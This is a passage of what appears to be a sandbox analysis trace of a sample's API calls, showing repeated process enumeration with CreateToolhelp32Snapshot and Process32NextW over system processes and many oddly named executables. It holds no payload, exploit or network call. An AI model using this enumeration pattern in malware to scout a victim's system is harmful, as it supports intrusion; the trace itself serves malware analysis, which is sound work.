lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0110.000] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0110.001] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0110.002] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0110.003] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0110.004] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0110.006] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0110.007] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0110.008] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0110.009] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0110.010] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.011] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0110.012] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0110.013] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0110.014] CloseHandle (hObject=0xbc) returned 1 [0110.014] Sleep (dwMilliseconds=0x12c) [0110.317] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0110.321] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.322] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0110.323] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0110.323] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, 
th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0110.324] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0110.325] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0110.326] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0110.326] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0110.327] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0110.328] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0110.328] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.329] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.330] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.330] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.331] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.332] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0110.333] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.333] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.334] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0110.335] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.336] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0110.337] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0110.338] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0110.339] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0110.341] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.342] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0110.343] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0110.344] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0110.345] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0110.347] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0110.348] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0110.349] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0110.350] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0110.351] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0110.353] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0110.354] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0110.355] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0110.356] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0110.357] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0110.358] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0110.359] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0110.360] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0110.361] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0110.362] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0110.363] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0110.364] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0110.365] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.366] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0110.367] CloseHandle (hObject=0xc4) returned 1 [0110.367] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0110.372] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.373] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0110.373] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0110.374] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, 
dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0110.374] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0110.375] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0110.376] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0110.376] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0110.377] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0110.378] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0110.378] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0110.379] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.380] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.380] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.381] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.382] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0110.382] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.383] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
